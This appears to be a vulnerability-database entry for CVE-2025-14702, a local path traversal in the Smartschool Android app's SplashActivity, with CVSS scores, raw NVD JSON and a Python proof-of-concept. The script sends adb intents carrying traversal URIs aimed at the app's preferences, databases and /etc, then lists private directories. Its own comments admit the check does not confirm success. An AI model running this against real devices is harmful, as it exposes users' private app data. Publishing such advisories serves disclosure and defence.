Security Vulnerability Report
CVE-2025-14702 CVSS 4.4 MEDIUM

CVE-2025-14702

Published: 2025-12-15 04:15:37
Last Modified: 2026-04-29 01:00:02

Description

A flaw has been found in Smartbit CommV Smartschool App up to 10.4.4. An unknown function of the component be.smartschool.mobile.SplashActivity is affected. Manipulation can lead to path traversal. The attack requires local access. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Smartbit CommV Smartschool App <= 10.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14702 PoC - Path Traversal in Smartschool App
# Target: Smartbit CommV Smartschool App <= 10.4.4
# Component: be.smartschool.mobile.SplashActivity
import os
import subprocess

# Package under test; every adb interaction below is scoped to it.
_PACKAGE = "be.smartschool.mobile"

# Traversal sequences the PoC feeds to SplashActivity as a file:// URI.
_TRAVERSAL_PATHS = (
    "../../data/data/be.smartschool.mobile/shared_prefs/",
    "../../data/data/be.smartschool.mobile/databases/",
    "../../data/data/be.smartschool.mobile/files/",
    "../../sdcard/Android/data/be.smartschool.mobile/",
    "../../../etc/",
    "../../../../system/etc/",
)

# App-private locations whose listing is attempted afterwards.
_SENSITIVE_LOCATIONS = (
    "/data/data/be.smartschool.mobile/shared_prefs/",
    "/data/data/be.smartschool.mobile/databases/",
    "/storage/emulated/0/Android/data/be.smartschool.mobile/",
)


def _adb_shell(*argv, text=False):
    """Run one `adb shell` command with output captured; return the CompletedProcess."""
    return subprocess.run(["adb", "shell", *argv], capture_output=True, text=text)


def check_vulnerable():
    """
    Report whether the Smartschool package is listed by `pm list packages`.

    Returns True when the package name occurs in adb's stdout, False otherwise.
    NOTE(review): this is an installed-or-not check only; no version is read, so
    nothing here confirms the device is inside the affected range (<= 10.4.4).
    The substring test also matches any package whose name contains the prefix.
    """
    package_name = "be.smartschool.mobile"
    listing = _adb_shell("pm", "list", "packages", package_name, text=True).stdout
    installed = package_name in listing
    if installed:
        print(f"[+] {package_name} is installed")
    else:
        print(f"[-] {package_name} is not installed")
    return installed


def exploit_path_traversal():
    """
    Launch SplashActivity once per traversal path, passing it as a file:// data URI.

    The command output is captured and discarded, so this function does not
    observe whether any launch had an effect; it only issues the intents.
    """
    for candidate in _TRAVERSAL_PATHS:
        print(f"[*] Attempting path: {candidate}")
        # Intent data URI carries the traversal sequence; the whole command is
        # handed to `adb shell` as one argument, as the original PoC did.
        launch = f"am start -n be.smartschool.mobile/.SplashActivity -d file://{candidate}"
        _adb_shell(launch)


def verify_exposed_files():
    """
    Try to list each app-private location through `run-as be.smartschool.mobile`.

    A zero return code is reported as "Accessible" and the listing is printed.
    NOTE(review): `run-as` is governed by whether the package is debuggable,
    not by the intents sent in exploit_path_traversal(); a successful listing
    here is therefore not evidence that the traversal itself worked.
    """
    for location in _SENSITIVE_LOCATIONS:
        outcome = _adb_shell("run-as", "be.smartschool.mobile", "ls", "-la", location, text=True)
        if outcome.returncode != 0:
            print(f"[-] Not accessible or not found: {location}")
            continue
        print(f"[+] Accessible: {location}")
        print(outcome.stdout)


if __name__ == "__main__":
    print("CVE-2025-14702 Path Traversal PoC")
    print("=" * 50)
    # Only proceed past the install check; the later steps are unconditional.
    if check_vulnerable():
        print("\n[*] Testing path traversal vulnerability...")
        exploit_path_traversal()
        print("\n[*] Verifying exposed files...")
        verify_exposed_files()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14702", "sourceIdentifier": "[email protected]", "published": "2025-12-15T04:15:36.760", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Smartbit CommV Smartschool App up to 10.4.4. Impacted is an unknown function of the component be.smartschool.mobile.SplashActivity. Executing manipulation can lead to path traversal. The attack requires local access. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 3.2, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/4", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336419", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336419", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.706220", "source": "[email protected]"}]}}